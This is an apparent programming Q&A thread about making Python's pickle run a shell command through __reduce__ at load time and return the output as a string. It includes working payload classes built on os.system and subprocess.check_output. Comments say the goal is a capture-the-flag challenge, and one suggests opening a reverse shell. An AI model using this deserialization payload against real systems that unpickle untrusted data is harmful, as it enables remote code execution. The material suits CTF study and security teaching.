# How to implement code execution via __reduce__ for pickling?

Tags: python, python-3.x, pickle

```py
import pickle
import os

class Inject(object):
     def __reduce__(self):
          return (os.system, ('ls',))

serialize = pickle.dumps(Inject())
command_res = pickle.loads(serialize)
print(type(command_res))
```

The problem is that `pickle.loads` returns a `tuple` and second element of tuple is `int`, so `command_res` will assigned to an `int`, but I want to get first index `[0]` of `pickle.loads`, so `command_res` will be assigned to `str`, which is the result of `ls`.

How can I do that?

Comment: No, `pickle.loads` is not returning a list here.  It's returning an integer.

Comment: `pickle.loads` is returning a list but `command_res` is assigning to the last element of `list` which is `int`.

Comment: Sorry, `pickle.loads` is returning a `tuple` not list for this example. `<tuple(str, int)>`

Answer (score 1):

The problem is that `os.system` doesn't return the output of the command `ls`, if you execute the command with the library [subprocess](https://docs.python.org/2/library/subprocess.html#subprocess.check_output) you get the output and can get an `str` instead of an `int`, so your code would be:

```
import pickle
import subprocess

class Inject(object):
     def __reduce__(self):
          return (subprocess.check_output, (['ls'],))

serialize = pickle.dumps(Inject())
command_res = pickle.loads(serialize).decode()
print(type(command_res))
```

Comment: Thank you, but I want to get `str` after `pickle.loads(serialize)` without using `decode()`.

Comment: @0x01h any specific reason to do that?

Comment: **CTF** (Capture The Flag) question.

Comment: @0x01h use the code execution to open a reverse shell and read the flag from there.